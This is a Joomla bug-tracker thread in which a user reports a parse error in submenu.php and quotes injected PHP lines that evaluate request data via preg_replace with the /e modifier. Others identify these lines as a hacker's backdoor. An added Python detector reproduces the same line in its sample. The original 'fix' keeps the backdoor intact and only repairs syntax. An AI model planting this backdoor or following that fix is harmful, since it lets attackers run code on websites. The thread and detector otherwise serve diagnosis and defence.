CDNKnights
19 Dec 2015

Steps to reproduce the issue

After updating to v3.4.6 from 3.4.5 when using the backend and going to Article Manager a blank page is displayed.

Expected result

Article Manager (or other selected area) would be displayed

Actual result

Parse error: syntax error, unexpected ':' in /public_html/layouts/joomla/sidebars/submenu.php on line 81

System information (as much as possible)

Additional comments

The issue occurs on lines 81, 110 and 137. This is caused by a mixing of control syntax (if() {} and if() :).

I was able to fix the issue by making the following replacements:

Line 80 / 81
Replace:
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/}
else : ?>

With:
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/} ?>
<?php else : ?>

Line 109 / 110
Replace:
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/}
else :

With:
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/} ?>
<?php else :

Line 136 / 137
Replace:
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/}
else : ?>

With:
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/} ?>
<?php else : ?>

I'm unfamiliar with this Bug Tracker and GitHub so I'm sure this isn't how I'm supposed to provide a solution. My apologies on that one.

CDNKnights - open - 19 Dec 2015
bertmert - comment - 19 Dec 2015

I'm sorry to say this: Your site has been hacked. You updated too late.

These are typical hacker lines and not present in original submenu.php.
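
A detection sketch for the injected lines identified in this thread, added here as an example and not part of any participant's post or of Joomla's own code: it flags `preg_replace` calls that use the `/e` modifier and marks those whose arguments come from request data. The function names and verdict labels are assumptions; the constructed sample reuses the injected line as quoted in the report.

```python
import re
from pathlib import Path

# preg_replace('<delim>pattern<delim>modifiers', ...) with a single-character delimiter.
PREG_CALL = re.compile(
    r"""preg_replace\s*\(\s*(?P<q>['"])(?P<d>[^\w\s\\]).*?(?P=d)(?P<mods>[A-Za-z]*)(?P=q)(?P<rest>[^;]*)""",
    re.IGNORECASE,
)
REQUEST_DATA = re.compile(r"\$_(?:REQUEST|GET|POST|COOKIE)\b")


def scan_php(source):
    """Return (line_number, verdict) for each preg_replace call using the /e modifier."""
    findings = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for call in PREG_CALL.finditer(line):
            if "e" not in call.group("mods"):
                continue  # ordinary regex replacement, nothing is evaluated
            # /e evaluates the replacement as PHP code (removed in PHP 7).
            # Request data in the remaining arguments is the pattern seen in this report.
            tainted = REQUEST_DATA.search(call.group("rest"))
            findings.append((lineno, "request-controlled" if tainted else "review"))
    return findings


def scan_tree(root):
    """Scan every .php file under root; returns {path: findings} for files with hits."""
    hits = {}
    for path in sorted(Path(root).rglob("*.php")):
        found = scan_php(path.read_text(errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


# Constructed sample: benign template lines around the injected line as quoted in the report.
SAMPLE = r"""<?php if ($displayMenu) : ?>
<?php $title = preg_replace('/\s+/', ' ', $title); ?>
if (isset($_REQUEST["qGoW"])) {/xRSGGgguzE/@preg_replace('/(.)/e', @$_REQUEST['qGoW'], '');/GBCFJeL*/}
<?php echo preg_replace('/x/e', 'strtoupper("x")', $label); ?>
"""

if __name__ == "__main__":
    for lineno, verdict in scan_php(SAMPLE):
        print(lineno, verdict)
```

A hit only shows that a file has been altered; comparing the tree against a clean copy of the same Joomla release and reviewing access logs, as suggested later in the thread, is still needed to find what else was changed.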

CDNKnights - comment - 19 Dec 2015

Interesting...I was wondering why there was such a difference in the files between the demo site and other sites.

I just feel stupid now! Was trying to help a guy on the forums and thought I'd found something that got missed.

Sorry all.


This comment was created with the J!Tracker Application at issues.joomla.org/joomla-cms/8741.

brianteeman - change - 19 Dec 2015
Status: New → Closed
Closed_Date: 0000-00-00 00:00:00 → 2015-12-19 18:30:22
Closed_By: brianteeman
brianteeman - close - 19 Dec 2015
WillSmithPhoto - comment - 3 Jan 2016

I had the same problem (although on line 91 instead of 81). The same code was in the same file, but I'm dumb-struck as to how the hack occurred. I have the strongest passwords (caps, non-caps, numbers & symbols), I own & maintain my own servers, there are very few external Joomla! users and none at any sort of Super User level, plus I have no FTP accounts on the affected webspace whatsoever. MySQL DB passwords were automatically generated by the server and consist of 12 characters of random alpha/numeric/symbol construction, and held only in Joomla!'s configuration.php file. I NEVER allow my browser to save passwords and never share them with others.

My question is, how on earth did my site get hacked (as above) with the security I have implemented??? I figure it has to be one of the following...
1. A "Super-User" account in Joomla! got hacked
2. The "Root" password on the server in question got hacked
3. Joomla!'s own code was abused to re-write its core PHP files
4. Something else?

Joomla! version: 3.4.5
PHP version: 5.4.36
Platform: Linux (CentOS)

Any & all help gratefully appreciated as I really don't want this to happen again.

Thanks all! ;)


brianteeman - comment - 3 Jan 2016

Really simple answer. You're not updating joomla.

WillSmithPhoto - comment - 3 Jan 2016

Thanks for the response. I update my Joomla! installs as often as possible but this has lapsed a bit over the December/Christmas/New Year period. Are you saying that the reason my site got hacked was a security hole in the code of Joomla! v3.4.5? I just want confirmation on the cause of this problem so I can take steps to avoid it ever happening again.

In my experience, the "really simple answer" is often not the right answer.

Many thanks!


brianteeman - comment - 3 Jan 2016

A bit longer time span than that but yes most likely

WillSmithPhoto - comment - 3 Jan 2016

Thanks for your input "brianteeman", but I'm looking for an answer as to what actually allowed this specific hack, rather than a likelihood based on assumptions. I've made a bunch of assumptions myself and secured all the obvious gateways, but I'm looking to secure all of my sites (1 of which seems to have been hacked in the ways described above, the other 24 seem unaffected at the moment). Should I change passwords, encryption keys, server root credentials, or is Joomla! itself at fault? Facts would be appreciated over conjecture.

Anything concrete is appreciated?

Many thanks!


mbabker - comment - 4 Jan 2016

You're not going to get specific answers like that on this forum. A proper
security audit with accredited professionals may help with the level of
detail you are looking for, but without giving someone access to your
server to review access logs and changes made as a result of a hack you're
going to get assumed answers.


WillSmithPhoto - comment - 4 Jan 2016

Thanks 'mbabker'. I agree, and I'm not looking for someone to tell me exactly what's gone wrong based on the information I have provided. I'm just surprised that this site got hacked when my personal security is pretty tight so I'm looking for someone who can confirm that either Joomla! v 3.4.5 is universally vulnerable to this kind of hack (and some info on how this hack is performed/defended against) or whether this is a Linux/CentOS/Other based attack, or if there's something else I haven't yet considered. How have other people been vulnerable to these attacks? What were their fixes? This is the kind of thing I'm after.

As mentioned previously, I have checked my server-error-logs and the errors are identical to the original poster's errors. My affected site is standard Joomla! v3.4.5 with no custom code changes made. My security is as good as I ever thought would be needed, but it was this forum thread that made me believe my site was hacked. I just want to narrow down the cause of this hack as I have 30 years' experience in this sector and I genuinely don't get why my site has suffered this failure.

Any & all input appreciated. Thanks all!


brianteeman - comment - 4 Jan 2016

You already have the only answer that can be given without access to your
server.

WillSmithPhoto - comment - 4 Jan 2016

I understand, thanks for your help. I was hoping that this particular hack was a well known one with a predictable entry point.

Many thanks!

